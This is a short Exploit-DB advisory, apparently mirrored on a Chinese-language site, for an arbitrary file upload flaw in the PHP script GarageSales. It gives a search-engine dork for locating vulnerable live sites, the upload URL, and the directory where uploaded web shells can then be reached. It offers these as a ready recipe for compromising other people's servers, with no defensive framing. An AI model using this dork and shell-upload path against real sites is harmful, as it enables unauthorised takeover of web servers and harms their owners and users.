GarageSales – Arbitrary File Upload

• Exploit Database
• 115 阅读

• 作者： saidinh0
  日期： 2010-04-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12128/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  # Exploit Title: [GarageSales Remote Upload Vulnerability] # Date: [06/04/2010] # Author: [saidinh0] # Software Link: [N/A] # Version: [2004/2008] # Tested on: [Linux/unix] # CVE : [if exists] # Code : [N/A] #Email : cgd@hotmail.com   ################################################### | Intorduction :`|   Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p ###################################################   [Dork ]:inurl:post.php?Category=Garage   {exploit} :http://127.0.0.1/post.php?Category=Garage   Example : http://[site]/searchgarage/post.php?Category=Garage   After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php     Example : http://[site]/searchgarage/up_files/1269813788CrewSheLL.php   ###################################################     Greetz To: All my friends :p , Dos02.com Team ,Moroccan H4x0rz   --=-=-=-=-Dos02.com , owned-m.com/cc , vid2all.com -=-=-=-=--=